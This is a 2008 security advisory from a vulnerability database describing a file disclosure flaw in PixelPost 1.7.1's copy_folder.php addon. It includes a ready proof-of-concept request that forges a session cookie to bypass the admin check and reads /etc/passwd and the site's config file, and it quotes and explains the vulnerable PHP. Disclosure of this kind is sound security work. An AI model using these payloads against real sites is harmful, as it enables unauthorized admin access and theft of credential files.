Security Advisory: PixelPost 1.7.1 File Disclosure - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  XSS - NEXTGEN GALLERY 0.96 WORDPRESS PLUGIN
  webTA by kronos - XSS

From: Charles "real" F. <charlesfol_(at)_hotmail.fr>
Date: 09.06.2008
Subject: PixelPost 1.7.1 File Disclosure

##
## PixelPost 1.7.1 File Disclosure
## by Charles "real" F. <charlesfol[at]hotmail.fr>
##                        [http://realn.free.fr]
##
## Requires register_globals = On
##          magic_quotes_gpc = Off
##
##
## PROOF OF CONCEPT
## ****************
##
## TARGET URL: http://[url]/addons/copy_folder.php?
##
## _GETDATA=files[0]=/etc/passwd&cfgrow[password]=p4ssw0rd&cfgrow[timestamp]
=0&cfgrow[imagepath]=file.txt%00
## POSTDATA=copyfolder=ok&folder_path=ok
## COOKDATA=_SESSION[pixelpost_admin]=p4ssw0rd
##
## Note: You can get a FPD, just loading http://[url]/addons/copy_folder.php.
##       This would be useful to get config file, which is located here:
##       ./includes/pixelpost.php
##
## EXPLANATIONS
## ************
##
## First of all, we have to bypass this line:
##
C# 32. if(!isset($_SESSION["pixelpost_admin"])
C#   . || $cfgrow['password'] != $_SESSION["pixelpost_admin"]
C#   . || $_GET["_SESSION"]["pixelpost_admin"] == $_SESSION["pixelpost_admin"]
C#   . || $_POST["_SESSION"]["pixelpost_admin"] == $_SESSION["pixelpost_admin"])
C#   . die ("Try another day!!");
##
## The author tries to prevent $_SESSION overwrite, but forgets that COOKIES are
## "registered" too.
## To bypass this, we have to set a cookie:   _SESSION[pixelpost_admin]=p4ssw0rd
## and a GET var:                                      cfgrow[password]=p4ssw0rd
##
## We got ADMIN ACCESS.
##
C# 52. if($addon_handle = opendir($folder))
C# 53. {
C# 54.     while (false !== ($file = readdir($addon_handle)))
C# 55.     {
C# 56.         if($file != "." && $file != ".." && $file != ".DS_Store")
C# 57.         {
C# 58.             $files[]=$file;
C# 59.             $files_withdate[$counter]['filename'] = $file;
C# 60.             $exifdate = copy_folder_get_exif_date($folder.$file);
C# 61.             $files_withdate[$counter]['date'] = $exifdate;
C# 62.             $counter++;
C# 63.         } // end file !"."
C# 64.     } // end while
C# 65. closedir($addon_handle);
C# 66. } // if addon_handle done
##
## $folder var can't be defined: it's '/'.
## But $files[] array is not initialized, so we can select which file we wanna
## see.
##
## Finally, line 102, we got our final and useful function:
##
C# 102. if(copy($file,$newpath))
##
## But that's not thats simple:
## In fact, every file in "/" will be copied IN THE SAME FILE, file.txt
## So we need a perfect timing to get config file.
## An advantage is the "sleep(1)" which is called at every iteration of
## the copy().
##
## Then we'll just have to go on http://[url]/addons/file.txt
##
## POC
## ***
## Do it yourself.
## You'll maybe have to multithread, have fun =)
##

test server